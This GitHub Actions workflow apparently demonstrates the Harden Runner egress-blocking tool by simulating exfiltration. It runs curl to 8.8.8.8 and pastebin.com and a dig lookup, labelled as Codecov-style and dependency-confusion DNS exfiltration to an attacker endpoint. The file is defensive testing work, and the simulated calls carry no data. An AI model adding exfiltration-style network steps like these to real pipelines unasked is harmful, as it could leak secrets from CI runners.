name: 2. Exfiltration Simulation
on:
  workflow_dispatch:

permissions:
  contents: read

jobs:
  exfiltration-simulation:
    runs-on: ubuntu-latest
    steps:
      - name: Harden Runner
        uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
        with:
          egress-policy: block
          allowed-endpoints: >
            *:443
            *:80

      - uses: actions/checkout@f43a0e5ff2bd294095638e18286ca9a3d1956744 # v3.6.0

      
      - run: curl https://8.8.8.8
         
      # Dependency Confusion DNS Exfiltration Scenario
      - name: DNS Exfiltration
        run: dig google.com
      
      # Codecov Scenario: Exfiltrate data to attacker's endpoint
      - name: Data Exfiltration To Attacker Controller Endpoint
        run: curl pastebin.com -L
